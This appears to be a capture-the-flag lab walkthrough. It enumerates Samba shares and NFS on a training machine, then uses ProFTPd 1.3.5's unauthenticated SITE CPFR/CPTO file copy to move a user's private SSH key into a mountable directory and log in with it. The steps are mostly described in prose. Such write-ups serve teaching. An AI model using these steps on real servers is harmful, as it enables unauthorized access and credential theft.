Goals: Enumerate Samba for shares, manipulate a vulnerable version of proftpdEnumerate Samba for shares
Points to know:
What is the Server Message Block protocol?
The Server Message Block protocol (SMB protocol) is a client-server communication protocol used for sharing access to files, printers, serial ports, and other resources on a network. But SMB is developed only for windows.That’s why Samba was released.
Samba is based on Server Message Block (SMB) and allows to share files and printers with other computer’s including linux and unix.
Let’s scan the IP address of the machine using Nmap(Network Scanning Tool).
The second task is to enumerate the machine for SMB shares, we can do this by using the Nmap script.
Because on open smb shares, not only can everyone access the files contained therein, but anyone can also upload and execute arbitrary files on the remote host.
We found three SMB shares.
We are going to inspect anonymous share because it has an interesting path as we can see it is exposing a user ‘Kenobi’ there.
To inspect a share, we can use smbclient
smbclient is used to talk to the server and do operations like downloading and uploading files on to the server or on the localhost.
dir — to list files on the server
get — to download the file from the server(it will download it in your current directory)
Then cat log.txt to see the contents of the file as we can see the log of the generation of the public/private rsa key for user Kenobi and the path in which they are saved which is quite informative.
Remember the rpcbind? Have a look at the first screenshot.
Remote Procedure Call(RPC) is a software communication protocol that one program can use to request a service from a program located in another computer on a network.
The rpcbind utility maps RPC services to the ports on which they listen.The rpcbind service redirects the client to the proper port number so it can communicate with the requested service.
In our case, the rpcbind port is 111, so let’s enumerate the nfs(Network File System) on port 111 to see the mounted files using Nmap script.
As we can see the mount directory is /var
2. Manipulate a vulnerable version of proftpd
Now we also know that the version of ProFTPd is 1.3.5 from our first Nmap scan. This version is vulnerable and allows any unauthenticated user to copy files from one place to another on the server, we can exploit this to copy Kenobi rsa_key and paste it in /var directory which we can access.
Use the below commands to perform this task.
nc — use to open a remote connection given with the IP and port number.
SITE CPFR — To copy a file from a given path
SITE CPTO — To paste in a given path
Let’s mount the /var/tmp directory to our machine.
mkdir — To create a directory kenobi inside mnt folder.
mount — to mount or download the contents from the given path which in our case is var and we are downloading it in /mnt/kenobi
The tmp directory contains the id_rsa(rsa_key), which we can use to log in as kenobi.
Copy the id_rsa in the root directory give it 600 permission and then use the credentials to log in as kenobi.
SSH or Secure Shell is a network communication protocol that enables two computers to communicate.
Once logged in, we can see the user.txt file which contains the flag.